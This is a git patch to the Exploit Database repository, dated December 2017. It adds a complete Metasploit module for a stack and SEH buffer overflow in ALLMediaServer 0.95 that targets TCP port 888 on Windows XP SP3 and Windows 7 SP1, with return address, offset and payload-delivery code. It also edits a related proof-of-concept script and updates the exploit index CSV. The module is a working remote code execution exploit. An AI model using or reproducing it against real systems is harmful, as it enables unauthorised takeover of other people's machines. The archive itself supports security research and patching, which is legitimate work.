From be0fb79789acf4c5c3d5282f81544202f5a30323 Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Fri, 29 Dec 2017 05:02:21 +0000 Subject: [PATCH] DB: 2017-12-29 2 changes to exploits/shellcodes ALLMediaServer 0.95 - Buffer Overflow ALLMediaServer 0.95 - Buffer Overflow (PoC) ALLMediaServer 0.95 - Buffer Overflow (Metasploit) DotNetNuke DreamSlider 01.01.02 - Arbitrary File Download DotNetNuke DreamSlider 01.01.02 - Arbitrary File Download (Metasploit) --- exploits/windows/dos/43406.py | 14 +++--- exploits/windows/remote/43407.rb | 73 ++++++++++++++++++++++++++++++++ files_exploits.csv | 5 ++- 3 files changed, 83 insertions(+), 9 deletions(-) create mode 100755 exploits/windows/remote/43407.rb diff --git a/exploits/windows/dos/43406.py b/exploits/windows/dos/43406.py index ab2eeb68f..3b7649f83 100755 --- a/exploits/windows/dos/43406.py +++ b/exploits/windows/dos/43406.py @@ -11,13 +11,13 @@ -1. Description - -A buffer overflow vulnerability exists in MediaServer.exe in ALLPlayer ALLMediaServer 0.95 and earlier that could allow remote attackers to execute arbitrary code and/or cause denial of service on the victim machine/computer via a long string to TCP port 88. Te exploit this vulnerability, an attacker must connect to the server with a long-malicious string. - - -2. Proof of Concept - +#1. Description +# +#A buffer overflow vulnerability exists in MediaServer.exe in ALLPlayer ALLMediaServer 0.95 and earlier that could allow remote attackers to execute arbitrary code and/or cause denial of service on the victim machine/computer via a long string to TCP port 88. Te exploit this vulnerability, an attacker must connect to the server with a long-malicious string. +# +# +#2. Proof of Concept +# #!/usr/bin/python diff --git a/exploits/windows/remote/43407.rb b/exploits/windows/remote/43407.rb new file mode 100755 index 000000000..4e63c0f92 --- /dev/null +++ b/exploits/windows/remote/43407.rb @@ -0,0 +1,73 @@ +require 'msf/core' + +class Metasploit4 < Msf::Exploit::Remote + Rank = NormalRanking + + include Msf::Exploit::Remote::Tcp + include Msf::Exploit::Seh + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'ALLMediaServer 0.95 Buffer Overflow', + 'Description' => %q{ + This module exploits a stack buffer overflow in ALLMediaServer 0.95. + The vulnerability is caused due to a boundary error within the + handling of HTTP request. + }, + 'License' => MSF_LICENSE, + 'Author' => + [ + 'Anurag Srivastava', # Remote exploit and Metasploit module + ], + 'References' => + [ + [ 'EDB', '43406' ] + ], + 'DefaultOptions' => + { + 'ExitFunction' => 'process', #none/process/thread/seh + }, + 'Platform' => 'win', + 'Payload' => + { + 'BadChars' => "", + 'Space' => 660, + 'DisableNops' => true + }, + + 'Targets' => + [ + [ 'ALLMediaServer 0.95 / Windows XP SP3 - English', + { + 'Ret' => 0x00408315, # POP # POP # POP # RET + 'Offset' => 1072 + } + ], + [ 'ALLMediaServer 0.95 / Windows 7 SP1 - English', + { + 'Ret' => 0x00408315, # POP # POP # POP # RET + 'Offset' => 1072 + } + ], + ], + 'Privileged' => false, + 'DisclosureDate' => 'Dec 28 2017', + 'DefaultTarget' => 1)) + + register_options([Opt::RPORT(888)], self.class) + + end + + def exploit + connect + buffer = "" + buffer << make_nops(target['Offset']) + buffer << generate_seh_record(target.ret) + buffer << make_nops(19) + buffer << payload.encoded + print_status("Sending payload ...") + sock.put(buffer) + handler + disconnect + end +end \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index 219f5f6fa..34245d6ed 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -5435,7 +5435,7 @@ id,file,description,date,author,type,platform,port 43391,exploits/windows/dos/43391.py,"GetGo Download Manager 5.3.0.2712 - Buffer Overflow",2017-12-26,"Aloyce J. Makalanga",dos,windows, 43401,exploits/hardware/dos/43401.py,"Telesquare SKT LTE Router SDT-CS3B1 - Denial of Service",2017-12-27,LiquidWorm,dos,hardware, 43403,exploits/windows/dos/43403.py,"SysGauge Server 3.6.18 - Denial of Service",2017-12-27,"Ahmad Mahfouz",dos,windows, -43406,exploits/windows/dos/43406.py,"ALLMediaServer 0.95 - Buffer Overflow",2017-12-27,"Aloyce J. Makalanga",dos,windows, +43406,exploits/windows/dos/43406.py,"ALLMediaServer 0.95 - Buffer Overflow (PoC)",2017-12-27,"Aloyce J. Makalanga",dos,windows, 41623,exploits/windows/dos/41623.html,"Microsoft Edge 38.14393.0.0 - JavaScript Engine Use-After-Free",2017-03-16,"Google Security Research",dos,windows, 41629,exploits/windows/dos/41629.py,"FTPShell Client 6.53 - 'Session name' Local Buffer Overflow",2017-03-17,ScrR1pTK1dd13,dos,windows, 41637,exploits/windows/dos/41637.py,"FTPShell Server 6.56 - 'ChangePassword' Buffer Overflow",2017-03-19,ScrR1pTK1dd13,dos,windows, @@ -15874,6 +15874,7 @@ id,file,description,date,author,type,platform,port 43387,exploits/hardware/remote/43387.py,"Netcore / Netis Routers - UDP Backdoor Access",2016-12-15,nixawk,remote,hardware,53413 43388,exploits/multiple/remote/43388.md,"Trend Micro Smart Protection Server - Session Hijacking / Log File Disclosure / Remote Command Execution / Cron Job Injection / Local File Inclusion / Stored Cross-Site Scripting / Improper Access Control",2017-12-19,CoreLabs,remote,multiple, 43389,exploits/hardware/remote/43389.py,"COMTREND ADSL Router CT-5367 - Remote Code Execution",2017-12-26,TnMch,remote,hardware, +43407,exploits/windows/remote/43407.rb,"ALLMediaServer 0.95 - Buffer Overflow (Metasploit)",2017-12-28,"Anurag Srivastava",remote,windows, 41638,exploits/windows/remote/41638.txt,"HttpServer 1.0 - Directory Traversal",2017-03-19,malwrforensics,remote,windows, 41666,exploits/windows/remote/41666.py,"Disk Sorter Enterprise 9.5.12 - 'GET' Remote Buffer Overflow (SEH)",2017-03-22,"Daniel Teixeira",remote,windows, 41672,exploits/windows/remote/41672.rb,"SysGauge 1.5.18 - SMTP Validation Buffer Overflow (Metasploit)",2017-02-28,Metasploit,remote,windows, @@ -37677,7 +37678,7 @@ id,file,description,date,author,type,platform,port 43399,exploits/php/webapps/43399.txt,"Easy!Appointments 1.2.1 - Cross-Site Scripting",2017-12-27,LiquidWorm,webapps,php, 43400,exploits/hardware/webapps/43400.html,"Telesquare SKT LTE Router SDT-CS3B1 - Cross-Site Request Forgery",2017-12-27,LiquidWorm,webapps,hardware, 43402,exploits/hardware/webapps/43402.txt,"Telesquare SKT LTE Router SDT-CS3B1 - Information Disclosure",2017-12-27,LiquidWorm,webapps,hardware, -43405,exploits/aspx/webapps/43405.rb,"DotNetNuke DreamSlider 01.01.02 - Arbitrary File Download",2017-12-27,"Glafkos Charalambous",webapps,aspx, +43405,exploits/aspx/webapps/43405.rb,"DotNetNuke DreamSlider 01.01.02 - Arbitrary File Download (Metasploit)",2017-12-27,"Glafkos Charalambous",webapps,aspx, 41622,exploits/php/webapps/41622.py,"Wordpress Plugin Membership Simplified 1.58 - Arbitrary File Download",2017-03-16,"The Martian",webapps,php, 41625,exploits/hardware/webapps/41625.txt,"AXIS Communications - Cross-Site Scripting / Content Injection",2017-03-17,Orwelllabs,webapps,hardware, 41626,exploits/hardware/webapps/41626.txt,"AXIS (Multiple Products) - Cross-Site Request Forgery",2017-03-17,Orwelllabs,webapps,hardware,